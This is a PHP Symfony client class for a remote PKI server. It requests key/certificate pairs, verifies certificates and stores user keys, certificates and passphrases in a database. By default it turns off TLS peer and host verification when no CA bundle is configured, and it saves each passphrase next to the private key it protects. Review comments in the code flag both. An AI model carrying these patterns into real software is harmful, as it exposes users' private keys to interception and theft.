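<?php

namespace AppBundle\Utils\PkiServer;

use GuzzleHttp\Client;
use JMS\Serializer\Serializer;
use Symfony\Component\HttpFoundation\Response;
use AppBundle\Utils\PkiServer\Model\DistinguishedName;
use AppBundle\Utils\PkiServer\Model\Issuer;
use AppBundle\Entity\SSLCert\CustomerCertData;
use AppBundle\Entity\SSLCert\StaffCertData;
use AppBundle\Entity\SSLCert\UserCertData;
use AppBundle\Entity\Customer;
use AppBundle\Entity\Staff;
use Doctrine\ORM\EntityManager;

/**
 * Client for a remote PKI server.
 *
 * Requests key/certificate pairs, asks the server to verify or describe a
 * certificate, and persists the returned key material through Doctrine.
 * Every HTTP call authenticates with a client certificate and private key.
 */
class PkiNodeServer
{
    const CUSTOMERS_ORGANIZATION = "Customers organization";

    private $em;
    private $pkiServerClient;
    // Stored by the constructor but not read anywhere in this class.
    private $serializer;
    // Stored by the constructor but not read anywhere in this class.
    private $pki_username;
    // Passed to Guzzle as the passphrase of the client private key ('ssl_key').
    private $pki_password;
    private $pki_client_cert_path;
    private $pki_client_key_path;
    private $default_key_numbits;
    private $root_ca_name;
    private $ca_name;
    // Optional CA bundle used to authenticate the PKI server; null keeps the legacy behaviour.
    private $pki_ca_bundle_path;

    /**
     * @param EntityManager $em                   Doctrine entity manager used to store and load cert data
     * @param Client        $pkiServerClient      Guzzle client used for every PKI server call
     * @param Serializer    $serializer           kept for callers; unused in this class
     * @param string        $pki_username         kept for callers; unused in this class
     * @param string        $pki_password         passphrase of the client private key
     * @param string        $pki_client_cert_path path of the client certificate sent to the server
     * @param string        $pki_client_key_path  path of the client private key
     * @param int           $default_key_numbits  key size used by createUserCert()
     * @param string        $root_ca_name         root CA name sent as issuer "root"
     * @param string        $ca_name              CA name sent as issuer "name"
     * @param string|null   $pki_ca_bundle_path   CA bundle that signs the PKI server certificate;
     *                                            when set, TLS peer and host verification are enabled
     */
    public function __construct(
        EntityManager $em,
        Client $pkiServerClient,
        Serializer $serializer,
        $pki_username,
        $pki_password,
        $pki_client_cert_path,
        $pki_client_key_path,
        $default_key_numbits,
        $root_ca_name,
        $ca_name,
        $pki_ca_bundle_path = null
    ) {
        $this->em = $em;
        // The original assigned to $this->PkiServerClient, a dynamic property that
        // left the declared $pkiServerClient unset; property names are case-sensitive.
        $this->pkiServerClient = $pkiServerClient;
        $this->serializer = $serializer;
        $this->pki_username = $pki_username;
        $this->pki_password = $pki_password;
        $this->pki_client_cert_path = $pki_client_cert_path;
        $this->pki_client_key_path = $pki_client_key_path;
        $this->default_key_numbits = $default_key_numbits;
        $this->root_ca_name = $root_ca_name;
        $this->ca_name = $ca_name;
        $this->pki_ca_bundle_path = $pki_ca_bundle_path;
    }

    /**
     * Build the Guzzle request options shared by every PKI server call.
     *
     * @param array $payload body sent as JSON
     *
     * @return array Guzzle request options
     */
    private function buildRequestOptions(array $payload)
    {
        $options = [
            'cert' => $this->pki_client_cert_path,
            'ssl_key' => [$this->pki_client_key_path, $this->pki_password],
            'json' => $payload,
        ];

        if ($this->pki_ca_bundle_path !== null && $this->pki_ca_bundle_path !== '') {
            // Authenticate the server against the configured CA bundle.
            $options['verify'] = $this->pki_ca_bundle_path;

            return $options;
        }

        // NOTE(review): legacy behaviour, kept so existing deployments keep working.
        // With peer and host verification off the server is never authenticated, so
        // the key passwords sent and the private keys received over this channel are
        // not protected against interception. Configure $pki_ca_bundle_path.
        $options['curl'] = [
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
        ];

        return $options;
    }

    /**
     * Ask the PKI server for a new private key and signed certificate.
     *
     * @param string            $password password sent with the request
     * @param int               $numbits  requested key size
     * @param DistinguishedName $distName subject fields (C, ST, L, O, OU, CN, email)
     * @param Issuer            $issuer   root and name of the issuing CA
     * @param string            $type     certificate type sent to the server
     * @param string            $lifeTime accepted for compatibility; not sent to the server
     *
     * @return string raw response body
     */
    public function createNewCert($password, $numbits, $distName, $issuer, $type = "client", $lifeTime = "")
    {
        $payload = [
            'password' => $password,
            'numbits' => $numbits,
            'info' => [
                "C" => $distName->getC(),
                "ST" => $distName->getST(),
                "L" => $distName->getL(),
                "O" => $distName->getO(),
                "OU" => $distName->getOU(),
                "CN" => $distName->getCN(),
                "email" => $distName->getEmail(),
            ],
            'issuer' => [
                "root" => $issuer->getRoot(),
                "name" => $issuer->getName(),
            ],
            'type' => $type,
        ];

        $resp = $this->pkiServerClient->request(
            "POST",
            "/api/v1/certificate/pair/",
            $this->buildRequestOptions($payload)
        );

        return $resp->getBody()->getContents();
    }

    /**
     * Verify a certificate against the configured issuer.
     *
     * @param string $cert the certificate to check
     *
     * @return boolean true only when the server explicitly reports verified === true
     */
    public function checkCert($cert)
    {
        $payload = [
            'cert' => $cert,
            'issuer' => [
                'root' => $this->root_ca_name,
                'name' => $this->ca_name,
            ],
        ];

        $resp = $this->pkiServerClient->request(
            'PUT',
            '/api/v1/certificate/verify/',
            $this->buildRequestOptions($payload)
        );

        $json = json_decode($resp->getBody()->getContents(), true);

        // Fail closed: an undecodable body, a missing field or a non-boolean value
        // must never be reported as a successful verification.
        if (!is_array($json) || !isset($json['result']) || !is_array($json['result'])) {
            return false;
        }

        return isset($json['result']['verified']) && $json['result']['verified'] === true;
    }

    /**
     * Get the details of a certificate.
     *
     * @param string $cert the certificate to describe
     *
     * @return string raw response body
     */
    public function getCertInfo($cert)
    {
        // NOTE(review): this path has no "/api/v1" prefix, unlike the other two
        // endpoints in this class; confirm against the PKI server's routes.
        $resp = $this->pkiServerClient->request(
            "PUT",
            "/certificate/info/",
            $this->buildRequestOptions(['cert' => $cert])
        );

        return $resp->getBody()->getContents();
    }

    /**
     * Create a new private key and a signed certificate for a user (Customer or Staff).
     *
     * @param \AppBundle\Entity\BaseUser $user
     * @param string                     $passphrase
     *
     * @return string raw response body of createNewCert()
     */
    public function createUserCert($user, $passphrase)
    {
        $dn = new DistinguishedName();
        $dn->setC("CM");
        $dn->setST("CM");
        $dn->setL($user->getAddress()->getTown());

        // Only staff carry their company as organization; everyone else shares a fixed one.
        if ($user instanceof Staff) {
            $dn->setO($user->getCompany()->getName());
        } else {
            $dn->setO(self::CUSTOMERS_ORGANIZATION);
        }

        // The first role of the user becomes the organizational unit.
        $dn->setOU($user->getRoles()[0]);
        $dn->setCN($user->getUsername());
        $dn->setEmail($user->getEmail());

        $issuer = new Issuer();
        $issuer->setRoot($this->root_ca_name);
        $issuer->setName($this->ca_name);

        return $this->createNewCert($passphrase, $this->default_key_numbits, $dn, $issuer);
    }

    /**
     * Save the cert data of a user.
     *
     * @return boolean true if successful
     */
    public function saveUserCert($user, $privateKey, $cert, $passphrase)
    {
        // NOTE(review): the passphrase is persisted in the same record as the
        // private key it protects. Whether either field is encrypted at rest is
        // not visible here; confirm in the UserCertData mapping.
        $certData = new UserCertData();
        $certData->setUserId($user->getId());
        $certData->setPrivateKey($privateKey);
        $certData->setCert($cert);
        $certData->setPassphrase($passphrase);

        $this->em->persist($certData);
        $this->em->flush();

        return true;
    }

    /**
     * Load the cert data of a user from the database.
     *
     * @return \AppBundle\Entity\SSLCert\UserCertData
     */
    public function loadUserCertData($user)
    {
        return $this
            ->em
            ->getRepository('AppBundle:SSLCert\\UserCertData')
            ->findOneByUserId($user->getId());
    }

    /**
     * Create a private key and a certificate for a user and save them in the database.
     *
     * @param \AppBundle\Entity\User $user
     * @param string                 $passphrase
     *
     * @return boolean true when the operation succeeded
     *
     * @throws \RuntimeException when the server response holds no key/certificate pair
     */
    public function createAndSaveUserCert($user, $passphrase)
    {
        $resArray = json_decode($this->createUserCert($user, $passphrase), true);

        // Refuse to persist an empty record. The response is deliberately left out
        // of the message because it may contain private key material.
        if (!is_array($resArray) || !isset($resArray['result']['key'], $resArray['result']['cert'])) {
            throw new \RuntimeException('PKI server response does not contain a key/certificate pair.');
        }

        return $this->saveUserCert(
            $user,
            $resArray['result']['key'],
            $resArray['result']['cert'],
            $passphrase
        );
    }

    /**
     * Get the public and/or the private key of the server.
     *
     * Not implemented: the body is empty, so the call returns null.
     */
    public function getServerKey($returnPrivate)
    {
        //TODO return the keys of the server
    }
}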